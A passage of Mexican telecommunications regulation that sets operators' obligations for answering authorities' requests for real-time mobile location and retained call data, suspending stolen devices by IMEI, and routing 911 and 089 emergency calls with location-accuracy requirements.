II. Deberán notificar a los titulares de las Autoridades Facultadas y al Instituto, por medios físicos y/o electrónicos, el nombre del Área Responsable y sus datos de localización, incluyendo la dirección de correo electrónico; así como mantener actualizada dicha información en su portal de Internet a la cual podrán tener acceso las Autoridades Designadas, sin restricción alguna. La información actualizada del Área Responsable también deberá estar disponible a través de la Plataforma Electrónica o a través de otros instrumentos o mecanismos convenidos con dichas autoridades, siempre y cuando estos garanticen la seguridad e integridad de la información. Lo anterior, sin perjuicio de utilizar medios físicos.

Los Concesionarios y Autorizados deberán garantizar la interoperabilidad de la Plataforma Electrónica con los sistemas de información de las Autoridades Facultadas.

La información correspondiente de dicha Área Responsable deberá ser clasificada como confidencial o reservada por dichas instancias así como por el Instituto, de conformidad con las leyes aplicables, y

III. En caso de existir modificaciones relativas al Área Responsable, los Concesionarios y Autorizados deberán notificar a los titulares de las Autoridades Facultadas y al Instituto estos cambios al menos veinticuatro horas antes de que ocurran, en caso contrario, no se considerará como efectuada la modificación para todos los efectos legales a que haya lugar.

B. Del proceso para atender los requerimientos sobre localización geográfica en tiempo real de los Dispositivos o Equipos Terminales Móviles y entrega de datos conservados:

IV. Recibido el requerimiento, los Concesionarios y Autorizados se cerciorarán de que éste provenga de una Autoridad Designada así como de que corresponda a la Numeración Geográfica del Concesionario o Autorizado y contarán con un plazo no mayor a una hora a partir de la recepción del requerimiento para notificar al requirente, en su caso, el rechazo del requerimiento por alguna de las referidas razones;

V. En caso de que el Número Geográfico haya sido objeto de alta o baja o portación después de recibido el requerimiento o durante el alcance temporal del mismo requerimiento, el Concesionario o Autorizado deberá notificar al requirente en un plazo no mayor a una hora a partir de la alta o baja o portación del número, la fecha y hora en que el número se dio de alta o baja o portación y acotar el alcance temporal de la información que proporcionará;

VI. En el caso en que el Número Geográfico haya sido objeto de alta o baja o portación antes de la recepción del requerimiento, el Concesionario o Autorizado deberá notificarlo al requirente de manera inmediata o, en su defecto, en un plazo no mayor a una hora a partir de dicha recepción;

VII. En los casos referidos en las fracciones V y VI anteriores, los Concesionarios y Autorizados deberán entregar la información con la que cuenten y sea objeto del requerimiento, aun cuando a la fecha de respuesta el Número Geográfico haya sido objeto de alta, baja o portación;

VIII. En el caso de datos conservados durante los primeros doce meses previos a la notificación del requerimiento, el lapso máximo de una hora previsto en la fracción IV del presente lineamiento se entenderá contenido dentro de las veinticuatro horas establecidas en el artículo 190, fracción III, de la LFTR;

IX. En el caso de datos conservados con una antigüedad entre doce y veinticuatro meses previos a la notificación del requerimiento, los Concesionarios y Autorizados contarán con cuarenta y ocho horas contadas a partir de la recepción del requerimiento para proveer la información. Dentro de dicho plazo se incluye la hora señalada en la fracción IV del presente lineamiento;

X. Los plazos previstos en las fracciones VIII y IX anteriores se aplicarán siempre y cuando no exista otra disposición expresa de autoridad competente;

XI. Para efectos de cumplir con los plazos señalados en las fracciones VIII y IX anteriores, en el caso de requerimientos electrónicos, los Concesionarios y Autorizados deberán hacer uso de la Plataforma Electrónica, y

XII. La información de localización geográfica en tiempo real de los equipos de comunicación móvil, el IMEI y el IMSI del Dispositivo o Equipo Terminal Móvil objeto del requerimiento, será enviada inmediatamente sin exceder el plazo de una hora, después de haberse cerciorado que cumple con lo dispuesto en la fracción IV del presente lineamiento.

OCTAVO.- La o las Plataformas Electrónicas que los Concesionarios y Autorizados deberán utilizar para dar cumplimiento a los requerimientos electrónicos de localización geográfica en tiempo real de los equipos de comunicación móvil, así como de entrega de datos conservados por los Concesionarios y Autorizados, deberán contar con las siguientes características:

I. Los Concesionarios y Autorizados deberán establecer Plataformas Electrónicas que garanticen la seguridad e integridad de la información a efecto de proporcionar la información de localización geográfica en tiempo real y del registro de datos requerida por las Autoridades Designadas; en caso de que hayan convenido otros instrumentos o mecanismos con dichas autoridades, éstos deberán garantizar la seguridad e integridad de la información;

II. Las Plataformas Electrónicas de los Concesionarios y Autorizados utilizarán herramientas digitales tales como sellos y/o firmas digitales, como la prevista en la Ley de Firma Electrónica Avanzada u otras que resulten procedentes y acuerden entre sí, con el objeto de certificar la autenticidad e integridad de los requerimientos o del acuse electrónico correspondiente, respectivamente, a efecto de permitir la validación automática de los requerimientos que gestionen las Autoridades Designadas con los Concesionarios y Autorizados;

III. Las Plataformas Electrónicas deberán proporcionar un acuse electrónico de recibo del requerimiento donde se indicará claramente la fecha y hora de recepción, considerando como referencia el huso horario que corresponda al lugar de donde se emita el requerimiento;

IV. Las Plataformas Electrónicas deberán contar con la funcionalidad de adjuntar archivos digitales que sustenten el requerimiento;

V. Los Concesionarios y Autorizados serán responsables de que los protocolos a utilizar o utilizados para la adquisición, desarrollo y/o implementación de dichas Plataformas Electrónicas, garanticen la integridad y seguridad de la información transmitida, manejada y resguardada, y funcionen con base en estándares internacionales, particularmente, aquellos relacionados con la salvaguarda y protección de los Datos Personales de los usuarios, así como para la cancelación y supresión segura de la información, tales como: ISO/IEC 27001 Information technology — Security techniques — Information security management systems — Requirements y/o NIST Special Publication 800-53 Security and Privacy Controls for Federal Information Systems and Organizations;

VI. Los Concesionarios y Autorizados deberán entregar al Instituto anualmente, durante el mes de julio, un informe referente a los protocolos mencionados en la fracción anterior, indicando la normatividad o estándar internacional al cual dichos protocolos se adhieren y dan cumplimiento. El informe referido deberá incluir el protocolo de control de acceso a la información sobre localización geográfica en tiempo real de los equipos de comunicación, así como de registro de datos por los Concesionarios y Autorizados y un análisis de riesgos relativo a la transmisión, manejo y resguardo de dicha información. El Instituto podrá realizar las observaciones y requerir se efectúen los ajustes necesarios cuando a su juicio deban de modificarse los protocolos de integridad, seguridad, cancelación y supresión de la información; lo anterior sin perjuicio de que el Instituto requiera información adicional cuando lo considere conveniente;

VII. El Instituto solicitará periódicamente a los titulares de las Autoridades Facultadas la información relativa a las medidas implementadas o a implementarse para asegurar que el resguardo y manejo de la información de localización geográfica y de registro de datos recibida se realice mediante el uso de protocolos de seguridad de la información y/o herramientas digitales tales como herramientas de Cifrado, firmas o sellos digitales. De la misma manera, el Instituto solicitará a los titulares de las Autoridades Facultadas los protocolos utilizados para la cancelación o supresión segura de la información recibida, una vez cumplido el fin para el cual fue solicitada. Dichos protocolos podrán tomar como base estándares internacionales, tales como: ISO/IEC 27001 Information technology — Security techniques — Information security management systems — Requirements, NIST Special Publication 800-53 Security and Privacy Controls for Federal Information Systems and Organizations y/o ETSI TS 102 656 Lawful Interception (LI); Retained Data; Requirements of Law Enforcement Agencies for handling Retained Data;

VIII. Los Concesionarios y Autorizados asegurarán la disponibilidad continua de la Plataforma Electrónica para la entrega de información de localización geográfica en tiempo real y de registro de datos, y en caso de interrupción del mismo, entregarán la información a la Autoridad Designada a través de un medio alterno autorizado por ésta, garantizando la seguridad e integridad de la misma, y

IX. Los Concesionarios y Autorizados serán responsables de actualizar la capacidad de la Plataforma Electrónica a efecto de atender, oportuna y efectivamente, todos los requerimientos de información solicitados por las Autoridades Designadas.

CAPÍTULO III

DE LA LOCALIZACIÓN GEOGRÁFICA EN TIEMPO REAL DE LOS DISPOSITIVOS O EQUIPOS TERMINALES MÓVILES

NOVENO.- Además de lo previsto en el lineamiento SÉPTIMO, el vínculo electrónico que se envíe a la Autoridad Designada con la información de localización geográfica en tiempo real, así como el IMEI y el IMSI, se mantendrá durante el alcance temporal que se especifique en el requerimiento, pudiendo ser reconfigurada por la Autoridad Designada la frecuencia con la que se actualice la información de localización geográfica (por horas, minutos, tiempo real, entre otros) durante el tiempo de vigencia de dicho alcance temporal, sin que tal modificación implique la presentación de un nuevo requerimiento. El cambio en la frecuencia de actualización será notificada por el mismo medio a través del cual se presentó el requerimiento.

Los Concesionarios y Autorizados deberán mantener simultáneamente el número de vínculos para el servicio de localización geográfica en tiempo real de los Dispositivos o Equipos Terminales Móviles que soliciten las Autoridades Designadas; para estos efectos los Concesionarios y Autorizados serán responsables de actualizar la capacidad de sus sistemas de localización geográfica en tiempo real.

DÉCIMO.- En la atención de los requerimientos de localización geográfica en tiempo real, los Concesionarios y Autorizados deberán cumplir con los parámetros de precisión establecidos en el lineamiento CUADRAGÉSIMO.

Sin perjuicio de lo anterior, el Instituto, escuchando a las instancias de seguridad y procuración de justicia a que se refiere el artículo 189 de la LFTR, informará a los Concesionarios la priorización por zonas geográficas en las que se requiere desplegar la infraestructura que permita mejorar la capacidad y precisión de localización geográfica de sus redes.

DÉCIMO PRIMERO.- Los Concesionarios y Autorizados no deberán realizar la localización geográfica en tiempo real de manera intrusiva, es decir, no deberán manipular de manera remota el Dispositivo o Equipo Terminal Móvil del usuario final para activar funcionalidades que permitan llevar a cabo la localización geográfica en tiempo real, salvo para dar cumplimiento a lo dispuesto en el Título Octavo de la LFTR.

CAPÍTULO IV

DEL REGISTRO Y ENTREGA DE DATOS DE COMUNICACIONES

DÉCIMO SEGUNDO.- El registro de datos de comunicaciones materia de estas disposiciones se refiere a la conservación de los datos enlistados en la fracción II del artículo 190 de la LFTR. Las comunicaciones privadas son inviolables. Exclusivamente la autoridad judicial federal, a petición de la autoridad federal que faculte la ley o del titular del Ministerio Público de la entidad federativa correspondiente, podrá autorizar la intervención de cualquier comunicación privada.

DÉCIMO TERCERO.- Además de lo previsto en el lineamiento SÉPTIMO, los Concesionarios y Autorizados estarán obligados a enviar el Número de “A” que identifica al origen de la llamada, de conformidad con lo establecido en el Plan Técnico Fundamental de Señalización sin alteraciones o enmascaramientos que impidan identificarlo.

DÉCIMO CUARTO.- El sistema o sistemas utilizados para el registro de datos de comunicaciones de líneas privadas y líneas de los servicios fijo y móvil deberán contar con la capacidad de almacenar y entregar los datos indicados en la fracción II del artículo 190 de la LFTR.

I. Para líneas privadas, se registrarán y conservarán los datos correspondientes al nombre del usuario registrado, la dirección de origen y destino de la línea;

II. Para el servicio fijo, se registrará y conservará la información correspondiente a:

a) Nombre y dirección del usuario registrado;

b) Tipo de Comunicación;

c) Números de origen y destino, y

d) Duración, fecha y hora de la comunicación.

III. Para el servicio móvil en las modalidades de prepago y pospago se registrará y conservará la información correspondiente a:

a) Nombre y dirección del usuario registrado, en el caso de la modalidad de pospago;

b) Tipo de Comunicación;

c) Los números de origen y destino;

d) Duración, fecha y hora de la comunicación;

e) Fecha y hora de la primera activación del servicio y la etiqueta de localización (identificador de celda);

f) La etiqueta de localización (identificador de celda);

g) IMEI;

h) IMSI;

i) En su caso, los IMSIs asociados a un mismo IMEI;

j) Modalidad de pago, y

k) En su caso, características técnicas del Dispositivo o Equipo Terminal Móvil.

IV. En el caso de la modalidad de prepago, se registrarán y conservarán además los datos que permitan identificar:

a) El lugar, fecha y hora en la que se realizó la compra del dispositivo de prepago y/o la tarjeta SIM, en el caso en que el Concesionario o Autorizado los comercialice por canales propios, o

b) En su caso, los datos del distribuidor al que fue entregado el dispositivo de prepago o la tarjeta SIM para su comercialización.

Los sistemas de procesamiento y almacenamiento de las bases de datos que utilicen los Concesionarios y Autorizados para dar cumplimiento a lo establecido en el presente Capítulo, deberán ubicarse exclusivamente en territorio nacional.

CAPÍTULO V

DE LOS GRUPOS DE TRABAJO

DÉCIMO QUINTO.- A efecto de definir y adoptar medidas que permitan una colaboración más efectiva y oportuna en materia de seguridad y justicia se establecerán Grupos de Trabajo conformados por las Autoridades Facultadas, Autoridades Designadas, el Instituto y los Concesionarios y Autorizados. Dichos Grupos darán seguimiento, entre otros, a los siguientes temas:

I. Implementación y evolución tecnológica de la Plataforma Electrónica prevista en el lineamiento OCTAVO y de los mecanismos para la entrega y recepción de los requerimientos de información sobre localización geográfica en tiempo real y entrega de datos conservados;

II. Evolución tecnológica e implementación de los parámetros de precisión y Rendimiento en materia de localización geográfica en tiempo real, y

III. Definición e implementación de, en su caso, nuevos requerimientos de información conforme a la evolución tecnológica de las telecomunicaciones.

DÉCIMO SEXTO.- El Instituto establecerá y coordinará dos Grupos de Trabajo, los cuales estarán integrados por los Concesionarios, Autorizados y las Autoridades Facultadas:

I. Grupo Ejecutivo. Tendrá por objeto tomar decisiones estratégicas en cuanto a la implementación de los presentes Lineamientos por lo que en las reuniones de éste deberán participar servidores públicos de las Autoridades Facultadas, Autoridades Designadas, el Instituto y representantes de los Concesionarios y Autorizados con capacidad de celebrar acuerdos en nombre de sus respectivas instituciones o empresas, y

II. Grupo Técnico. Tendrá por objeto analizar y proponer las alternativas técnicas que permitan la implementación de las decisiones adoptadas por el Grupo Ejecutivo con las que se dé cumplimiento a los lineamientos que emita el Instituto. Lo anterior sin perjuicio de que el Grupo Técnico defina su propia agenda de trabajo y en su caso, emita recomendaciones en materia de los presentes Lineamientos.

En su carácter de coordinador, el Instituto convocará a las reuniones de trabajo y será responsable de establecer y coordinar el sistema de archivos, acuerdos y memoria histórica para el debido funcionamiento de dichos Grupos de Trabajo.

Los acuerdos alcanzados entre las Autoridades Facultadas y los Concesionarios y Autorizados, en ningún sentido serán vinculantes para el Instituto ni implicarán la modificación de los presentes Lineamientos.

CAPÍTULO VI

DE LA TRANSPARENCIA Y PROTECCIÓN DE DATOS

DÉCIMO SÉPTIMO.- Sin perjuicio de lo establecido en la LFTR, los Concesionarios y los Autorizados son responsables respecto a la posesión, protección, tratamiento y control de los Datos Personales de los particulares. Se prohíbe la utilización de los datos conservados tanto para fines distintos a los previstos en el Capítulo Único del Título Octavo de la LFTR, como de los presentes Lineamientos. Cualquier uso distinto será sancionado por las autoridades competentes conforme a la legislación aplicable.

DÉCIMO OCTAVO.- Los Concesionarios y Autorizados deberán entregar al Instituto, en el mes de enero y julio de cada año, un informe semestral electrónico a través del mecanismo que para tales efectos establezca el Instituto, relativo al cumplimiento de los presentes Lineamientos. Dicho informe deberá contener y observar lo siguiente:

I. El número total y por Autoridad Facultada, de requerimientos de información de localización geográfica en tiempo real y de registro de datos de comunicaciones, desglosando las recibidas, entregadas y no entregadas mensualmente, utilizando el formato que se anexa a los presentes Lineamientos como Anexo II.

II. En el mes de julio, deberán integrar, además, el informe referido en el lineamiento OCTAVO, fracción VI.

III. En el mes de enero, deberán integrar, además, el informe referido en el lineamiento CUADRAGÉSIMO.

El Instituto solicitará a las Autoridades Designadas y/o Facultadas en el mes de enero y julio de cada año, un informe semestral relativo al número de requerimientos de localización geográfica en tiempo real y de registro de datos realizados, así como el número de registros de datos de comunicaciones cancelados y suprimidos de manera segura, una vez cumplido el fin para el cual fueron solicitados.

En términos de lo establecido en la Ley General de Transparencia y Acceso a la Información Pública y demás disposiciones aplicables, las autoridades señaladas en los artículos 189 y 190 de la LFTR, están obligadas a adoptar las medidas necesarias que garanticen la seguridad de los Datos Personales y eviten su alteración, pérdida, transmisión y acceso no autorizado.

La información estadística contenida en los informes semestrales será publicada en el portal de Internet del Instituto en términos de lo establecido en la Ley General de Transparencia y Acceso a la Información Pública y demás disposiciones aplicables.

En términos de lo establecido en la Ley General de Transparencia y Acceso a la Información Pública y demás disposiciones aplicables, en caso de que los sistemas de conservación de datos hayan sido vulnerados y los Datos Personales de los usuarios finales se encuentren comprometidos, los Concesionarios y Autorizados deberán notificar inmediatamente a éstos e indicar las medidas que el usuario podrá tomar para disminuir o contrarrestar cualquier afectación derivada de esta vulneración.

CAPÍTULO VII

DE LA SUSPENSIÓN DEL SERVICIO DE LOS DISPOSITIVOS O EQUIPOS TERMINALES MÓVILES REPORTADOS COMO ROBADOS O EXTRAVIADOS

DÉCIMO NOVENO.- Los Concesionarios y Autorizados deberán contar con un procedimiento expedito para:

I. Recibir, durante las veinticuatro horas del día de los trescientos sesenta y cinco días del año los reportes de robo o extravío de los Dispositivos o Equipos Terminales Móviles de sus usuarios; adicionalmente a sus centros de atención y número telefónico de atención, deberán contemplar medios electrónicos para la recepción de estos reportes;

II. A través de los mecanismos señalados en la fracción anterior, recibir y verificar los reportes de duplicación del IMEI de los Dispositivos o Equipos Terminales Móviles de sus usuarios, y

III. Acreditar la titularidad del Dispositivo o Equipo Terminal Móvil y/o los servicios contratados, en cualquier modalidad, de una manera ágil, sencilla y promoviendo la adopción de medios electrónicos, para solicitar la suspensión de los servicios de los dispositivos robados, extraviados o que hayan sido objeto de duplicación de IMEI.

Los procedimientos que se establezcan deberán incluir los mecanismos respectivos para los usuarios con discapacidad.

VIGÉSIMO.- Los Concesionarios y Autorizados deberán llevar un registro eficaz y fidedigno de los IMEI de los Dispositivos o Equipos Terminales Móviles reportados como robados o extraviados, así como aquellos que hayan sido objeto de duplicación de IMEI, y actualizar al menos cada veinticuatro horas dicho registro.

Los Concesionarios y Autorizados deberán intercambiar cada veinticuatro horas, los registros referidos en el párrafo anterior, en términos de lo dispuesto por la LFTR, en los presentes Lineamientos y, en su caso, en el marco de los acuerdos internacionales celebrados por el Gobierno Mexicano. Los Concesionarios y Autorizados deberán cerciorarse de que dichas listas contengan información referente a Dispositivos o Equipos Terminales Móviles reportados como robados o extraviados o con IMEI duplicado en otros países con los que el Gobierno Mexicano haya suscrito convenios o acuerdos al respecto.

VIGÉSIMO PRIMERO.- Los Concesionarios y Autorizados deberán poner a disposición del público en general, de forma fácilmente identificable, un aviso a través del cual se comunique la posibilidad de consultar en sus centros de atención y en su portal de Internet, los datos de los Dispositivos o Equipos Terminales Móviles robados o extraviados, incluyendo los intercambiados con otros Concesionarios, las bases de datos actualizada que contenga los números IMEI robados o extraviados y sus características técnicas así como los medios a utilizar para el reporte de robo o extravío.

Asimismo, difundirán a sus usuarios las funcionalidades de sus Dispositivos o Equipos Terminales Móviles relativas a localización y/o protección de contenido en caso de robo o extravío.

VIGÉSIMO SEGUNDO.- Los Concesionarios y Autorizados deberán suspender de forma inmediata el servicio de los Dispositivos o Equipos Terminales Móviles que hayan sido reportados como robados o extraviados por los usuarios que acrediten la titularidad del Dispositivo o Equipo Terminal Móvil, en la modalidad de prepago, y/o de servicios contratados en la modalidad de pospago.

VIGÉSIMO TERCERO.- Cuando los Concesionarios identifiquen que dentro de su red se encuentran en uso Dispositivos o Equipos Terminales Móviles que hayan sido objeto de duplicación de IMEI, notificarán de manera gratuita al usuario al respecto vía SMS y en su caso, al Autorizado para que este a su vez lo haga con el usuario, y le ofrecerán opciones para el cambio de Dispositivo o Equipo Terminal Móvil.

VIGÉSIMO CUARTO.- Los Concesionarios y Autorizados deberán verificar que los Dispositivos o Equipos Terminales Móviles que se conecten a sus redes no tengan reporte de robo o extravío, o que el IMEI asociado sea considerado inválido o se encuentre duplicado.

VIGÉSIMO QUINTO.- Los Concesionarios y Autorizados deberán reactivar los servicios de los Dispositivos o Equipos Terminales Móviles reportados como robados o extraviados en un periodo máximo de veinticuatro horas a partir de que el usuario lo solicite y acredite la titularidad del Dispositivo o Equipo Terminal Móvil en la modalidad de prepago y, en su caso, de los servicios contratados en la modalidad de pospago.

VIGÉSIMO SEXTO.- Los Concesionarios y Autorizados no deberán activar Dispositivos o Equipos Terminales Móviles que hayan sido objeto de duplicación de IMEI, ni activar o reactivar los servicios de los dispositivos o equipos que se encuentren reportados en las listas de Dispositivos o Equipos Terminales Móviles como robados o extraviados, salvo autorización expresa y previa acreditación de la titularidad del Dispositivo o Equipo Terminal Móvil y/o los servicios contratados. En caso de que exista un reporte por robo ante la autoridad competente, se seguirán los procedimientos legales que correspondan.

VIGÉSIMO SÉPTIMO.- Los Concesionarios y Autorizados, en coordinación con el Instituto, realizarán campañas de sensibilización dirigida a los usuarios acerca de los riesgos asociados con los Dispositivos o Equipos Terminales Móviles no homologados o falsificados.

VIGÉSIMO OCTAVO.- Los Concesionarios y Autorizados no deberán activar en sus redes Dispositivos o Equipos Terminales Móviles no homologados, con excepción de aquellos que se encuentren haciendo uso de la itinerancia internacional.

El Instituto pondrá a disposición del público en general en su portal de Internet una base de datos de los Dispositivos o Equipos Terminales Móviles que cuentan con certificado de homologación emitido por el mismo.

VIGÉSIMO NOVENO.- Cuando los Concesionarios y Autorizados identifiquen que dentro de su red se encuentran en uso Dispositivos o Equipos Terminales Móviles no homologados o falsificados, notificarán de manera gratuita al usuario al respecto vía SMS e informarán acerca de los riesgos del uso de éstos y le ofrecerán opciones accesibles para el cambio de Dispositivos o Equipos Terminales Móviles.

TRIGÉSIMO.- Cuando la autoridad competente instruya la suspensión inmediata del servicio para hacer cesar la comisión de delitos de conformidad con lo establecido en las disposiciones legales aplicables, y siempre que medie orden de autoridad judicial competente cuando así lo prevean dichas disposiciones, los Concesionarios y Autorizados deberán suspender el servicio. Será responsabilidad del Concesionario y del Autorizado, cualquier acción u omisión contraria a la instrucción de suspensión inmediata del servicio; conducta que será sancionada en términos de la LFTR, así como por las autoridades competentes en los términos de la legislación aplicable.

Los Concesionarios y Autorizados contarán con un Área Responsable disponible las veinticuatro horas del día de los trescientos sesenta y cinco días del año para atender las solicitudes de suspensión. Al efecto podrán designar a la misma Área Responsable a la que se refiere el lineamiento SÉPTIMO de los presentes Lineamientos.

CAPÍTULO VIII

DE LA CANCELACIÓN O ANULACIÓN DE MANERA PERMANENTE DE LAS SEÑALES DE TELEFONÍA CELULAR, DE RADIOCOMUNICACIÓN O DE TRANSMISIÓN DE DATOS O IMAGEN DENTRO DEL PERÍMETRO DE CENTROS DE READAPTACIÓN SOCIAL, ESTABLECIMIENTOS PENITENCIARIOS O CENTROS DE INTERNAMIENTO PARA MENORES, FEDERALES O DE LAS ENTIDADES FEDERATIVAS, CUALQUIERA QUE SEA SU DENOMINACIÓN

TRIGÉSIMO PRIMERO.- En lo que no se opongan a la LFTR, serán aplicables los “Lineamientos de Colaboración entre Autoridades Penitenciarias y los Concesionarios de Servicios de Telecomunicaciones y Bases Técnicas para la Instalación y Operación de Sistemas de Inhibición”, publicados en el DOF el 3 de septiembre de 2012 o las disposiciones que, en su caso, los sustituyan.

Los equipos de bloqueo de señales a instalarse dentro del perímetro de centros de readaptación social, establecimientos penitenciarios o centros de internamiento para menores, federales o de las entidades federativas, cualquiera que sea su denominación, deberán cumplir con las disposiciones técnicas que emita el Instituto y demás normatividad aplicable.

CAPÍTULO IX

DEL NÚMERO ÚNICO ARMONIZADO A NIVEL NACIONAL PARA LA PRESTACIÓN DE SERVICIOS DE EMERGENCIA Y DE LA PRIORIDAD DE LAS COMUNICACIONES EN CASOS DE EMERGENCIA

TRIGÉSIMO SEGUNDO.- Se establece el Número 911 (NUEVE, UNO, UNO), como número único armonizado a nivel nacional para la prestación de servicios de emergencia.

TRIGÉSIMO TERCERO.- El Secretariado Ejecutivo es el asignatario y administrador a nivel nacional del Número 911 para la prestación de servicios de emergencia, así como el código de servicios especiales 089 para el servicio de denuncia anónima.

TRIGÉSIMO CUARTO.- Los códigos de servicios especiales: 060 (Policía Local), 061 (Policía Judicial Estatal y del D.F.), 065 (Cruz Roja), 066 (Sistema Nacional de Atención de Emergencias de la Ciudadanía), 068 (Bomberos) y 080 (Seguridad y Emergencia) autorizados a las entidades gubernamentales y de servicio social, deberán migrar hacia el Número 911.

Ningún asignatario de códigos de servicios especiales podrá promocionar o prestar servicios de emergencia, a través de un número que no sea el Número 911, de lo contrario le será cancelada la correspondiente autorización. Asimismo, ningún asignatario de códigos de servicios especiales podrá promocionar o prestar servicios de denuncia anónima a través de un número diferente al 089, de lo contrario le será cancelada la correspondiente autorización. Queda exento de la migración el código de servicios especiales 088 (Servicios de Seguridad Pública Federal) el cual será utilizado por la Comisión Nacional de Seguridad, a través del Centro Nacional de Atención Ciudadana para informar a la ciudadanía sobre operativos vacacionales, información a migrantes, atención a delitos del fuero federal, entre otros.

TRIGÉSIMO QUINTO.- Los Concesionarios y Autorizados deberán proporcionar en forma gratuita e irrestricta incluyendo, sin ser limitativo, a teléfonos sin saldo, con servicio restringido y aparatos telefónicos de uso público, el acceso a los servicios de emergencia a través del Número 911 y a los servicios de seguridad 089 (Servicio de denuncia anónima); por tal razón, no facturarán a sus usuarios las llamadas, mensajes de texto SMS ni el tiempo aire según corresponda, asimismo no facturarán montos a los Concesionarios y/o Autorizados por la originación, terminación o tránsito de las llamadas al Número 911 y al 089.

TRIGÉSIMO SEXTO.- El Secretariado Ejecutivo, al contar con la asignación a nivel nacional del Número 911 como número único de emergencia y 089 para la prestación de servicios de denuncia anónima, es el órgano encargado de administrar y coordinar su implementación y operación entre la Federación, los Estados, el Distrito Federal, los Municipios, las entidades gubernamentales y de servicio social que lo requieran.

Asimismo, en términos de lo establecido en el artículo 111 de la Ley General del Sistema Nacional de Seguridad Pública o las disposiciones que, en su caso, los sustituyan, será el Secretariado Ejecutivo quien adopte las medidas necesarias para la armonización de los servicios y quien defina e implemente de forma gradual y ordenada el cambio del código de servicios especiales 066 al Número 911 en sus centros de atención de llamadas. El Secretariado Ejecutivo será la única entidad facultada para definir y modificar los enrutamientos de las llamadas o mensajes de texto SMS al 911 entre los centros de atención de llamadas de emergencia, así como los enrutamientos de las llamadas de denuncia anónima al 089.

TRIGÉSIMO SÉPTIMO.- Los centros de atención de llamadas de emergencia, mediante los mecanismos correspondientes, deberán contratar el número o los números necesarios con algún Concesionario local, para que éste complete las llamadas telefónicas del Número 911 al Número Geográfico correspondiente, lo mismo aplicará con respecto a los centros de atención de llamadas de denuncia anónima para el 089.

TRIGÉSIMO OCTAVO.- El Secretariado Ejecutivo, dando aviso al Instituto, proporcionará en formato electrónico a los Concesionarios y Autorizados, las actualizaciones a la matriz de enrutamiento del Número 911 y del código de servicios especiales 089 de cada entidad federativa, así como el nombre del Concesionario local que contrate para la correspondiente traducción y enrutamiento de los referidos números. Lo anterior, a efecto de que se lleve a cabo la configuración de red para el respectivo enrutamiento.

TRIGÉSIMO NOVENO.- Cuando los Concesionarios y Autorizados reciban una llamada telefónica de sus usuarios que tenga como destino el Número 911 o 089, deberán entregarla al Concesionario que fue contratado por los centros de atención de llamadas de emergencia o de denuncia anónima, respectivamente, de manera directa o por tránsito.

En caso de que el usuario envíe un mensaje de texto SMS al Número 911, éste será entregado al Concesionario contratado por los centros de atención de llamadas de emergencia, de manera directa o por tránsito. Las respuestas a dichos mensajes de texto SMS se entregarán en la misma forma al usuario.

CUADRAGÉSIMO.- Los Concesionarios y Autorizados deberán entregar las llamadas y mensajes de texto SMS realizados por sus usuarios al Número 911 junto con su localización geográfica en tiempo real (latitud y longitud), y la hora referenciada al huso horario de donde se origina la llamada, a los centros de atención de llamadas de emergencia.

En lo que hace a la localización geográfica en tiempo real referida en el párrafo anterior, los Concesionarios y Autorizados deberán cumplir con la precisión señalada en las Tablas 1 y 2 siguientes, de acuerdo a la tecnología empleada.

Tabla 1. Para tecnologías de localización geográfica basadas en la red celular (Triangulación):

Tipo de Localidad Precisión Rendimiento
Urbana <100 m. 67%
Suburbana <200 m. 67%
Rural <500 m. 67%

Nota: Por triangulación se refiere a tecnologías tales como, ToA (Time of Arrival), AoA (Angle of Arrival), U-TDOA (Uplink Time Difference of Arrival), AECID (Adaptive Enhanced Cell ID), WLS (Wireless Location Signatures) y tecnologías de localización basadas en la identidad celular (ej. CGI Cell o CELL-ID).

Tabla 2. Para tecnologías de geolocalización basadas en el dispositivo móvil (GPS):

Tipo de Localidad Precisión Rendimiento
Urbana <50 m. 50%
Suburbana <50 m. 67%
Rural <50 m. 67%

Nota: Por GPS se refiere a tecnologías tales como GPS (Global Position System), A-GPS (Assisted GPS), OTD (Observed Time Difference), E-OTD (Enhanced Observed Time Difference).

En caso de que el Concesionario esté imposibilitado técnicamente para llevar a cabo la localización geográfica mediante triangulación, debido a que no cuenta con la infraestructura de tres radiobases instaladas, como mínimo o, mediante GPS; el Concesionario deberá indicar al menos el identificador de celda y la distancia aproximada a la que se encuentra el Dispositivo o Equipo Terminal Móvil, derivada de la interacción del Dispositivo o Equipo Terminal Móvil con la radiobase.

En el caso referido en el párrafo anterior, el Concesionario deberá demostrar fehacientemente dicha imposibilidad técnica al Instituto, e informar sobre la misma a las Autoridades Facultadas y al Secretariado Ejecutivo.

Los parámetros de precisión de las Tablas 1 y 2 deberán observarse en al menos el 60% de la red del Concesionario y, en su caso, Autorizado, durante el primer año, el 70% en el segundo año, y así sucesivamente, incrementando en 10% su cumplimiento, año con año hasta llegar al 90% de la totalidad de su red.

Los Concesionarios y Autorizados remitirán al Instituto en el mes de enero de cada año un informe del cumplimiento relativo a los parámetros de precisión y Rendimiento establecidos en el presente lineamiento, mencionado en el lineamiento DÉCIMO OCTAVO. La metodología para verificar el cumplimiento de los parámetros de localización geográfica señalados en las Tablas 1 y 2 se realizará en ambientes exteriores.

En el caso de llamadas originadas en líneas fijas y de los aparatos telefónicos de uso público, los Concesionarios y Autorizados deberán entregar a los centros de atención de llamadas de emergencia, además de dicha llamada de emergencia, el domicilio tratándose de líneas fijas, o la ubicación geográfica del origen de la llamada tratándose de aparatos telefónicos de uso público.

CUADRAGÉSIMO PRIMERO.- La información relativa a la localización geográfica de los Dispositivos o Equipos Terminales Móviles, el domicilio de líneas fijas o la ubicación de aparatos telefónicos de uso público respectiva, referida en el lineamiento anterior, según corresponda, será entregada por los Concesionarios y Autorizados a los centros de atención de llamadas de emergencia con la finalidad de que se proporcionen a los usuarios servicios de emergencia.

Dicha información deberá ser cancelada o suprimida de manera segura por los centros de atención de llamadas de emergencia, una vez cumplido el fin para la cual le fue enviada. El Instituto solicitará al Secretariado Ejecutivo los protocolos utilizados para la cancelación y supresión segura de esta información.

Queda prohibida la utilización de los datos conservados para fines distintos a los previstos en el Capítulo Único del Título Octavo de la LFTR o en los presentes Lineamientos. Cualquier uso distinto será sancionado por las autoridades competentes conforme a la legislación aplicable.

CUADRAGÉSIMO SEGUNDO.- Los Concesionarios y Autorizados deberán coadyuvar para informar a sus usuarios de la existencia y funcionalidad de los números 911 y 089, a través de campañas publicitarias, en lugares visibles en sus centros de atención y medios electrónicos.

CUADRAGÉSIMO TERCERO.- El Comité Técnico de Portabilidad coadyuvará para la implementación de lo establecido en el presente Capítulo; asimismo, deberá llevar a cabo las acciones necesarias a efecto de colaborar en el logro de la eficiente operación del Número 911.

